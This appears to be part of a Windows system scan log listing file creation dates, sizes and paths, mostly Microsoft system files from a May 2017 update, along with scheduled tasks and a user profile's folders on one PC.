2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk
2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver
2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini
2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG
2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-05-07 17:23 - 2017-05-22 18:36 - 02049386 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-05-07 17:17 - 2017-05-22 18:29 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003084 _____ C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908}
2017-05-07 17:17 - 2017-05-07 17:17 - 00002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician
2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared
2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino
2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten
2017-05-07 17:13 - 2017-05-22 18:28 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2017-05-07 17:13 - 2017-05-21 20:55 - 00342672 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD
2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf
